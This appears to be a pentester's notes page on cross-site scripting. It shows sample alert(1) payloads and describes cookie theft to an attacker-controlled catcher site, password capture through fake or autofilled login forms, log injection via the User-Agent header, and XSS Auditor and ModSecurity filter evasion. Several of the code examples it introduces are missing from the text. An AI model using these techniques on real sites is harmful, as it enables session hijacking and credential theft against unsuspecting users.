XSS/Cross Site Scripting
Last updated
Last updated
XSS can occur as a result of the following things:
The attacker can inject certain HTML tags
The simplest example is the <script>
tag, but others can also work, such as <img src=x onerror=alert(1)>
The attacker can inject text in between certain tags or in certain fields
The same as above, but instead of injecting the tag, the tag already exists, and the attacker is able to write text in between the tag.
For example, there's a <img src=ATTACKER_INPUT_HERE>
tag, and the attacker injects x onerror=alert(1)
The attacker can inject a malicious URL.
For example, <a href="javascript:alert(1)">click me</a>
You can try to sneak XSS payloads into logs. If the application that views the logs treats input insecurely, then it might result in XSS.
If the User-Agent header is logged, then putting the payload there would be an easy way to get javascript into the log file.
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS Injection
Here are some common ones:
If cookies are configured to be accessible via Javascript (no HttpOnly flag), then you can just fetch the cookie and do a GET request to a site you control:
If you need a site for catching cookies, then https://requestcatcher.com/ should be useful.
TODO: Link phishing page under Social Engineering or Web App Hacking?
You can capture a user's password. For example:
You can display a login page to the user and capture their password if they choose to enter it.
If the victim’s browser has remember password enabled, you can put a login form on the page, wait 1 second while the browser pastes their password there and then capture that.
Works for Chrome XSS Auditor and many other filters. The bypass works by having two query parameters that you can inject into. When you combine the two injections, then a valid javascript payload is formed, and the XSS auditor doesn't detect it.
For example, the first parameter:
The second parameter:
More bypasses: https://www.youtube.com/watch?v=8GwVBpTgR2c
https://materials.rangeforce.com/tutorial/2019/10/23/ModSecurity-Filter-Evasion/
This works for weak (default) ModSecurity rulesets.
Simple example:
If malicious input is stripped only once, then try nested payloads:
Here are some more interesting payloads: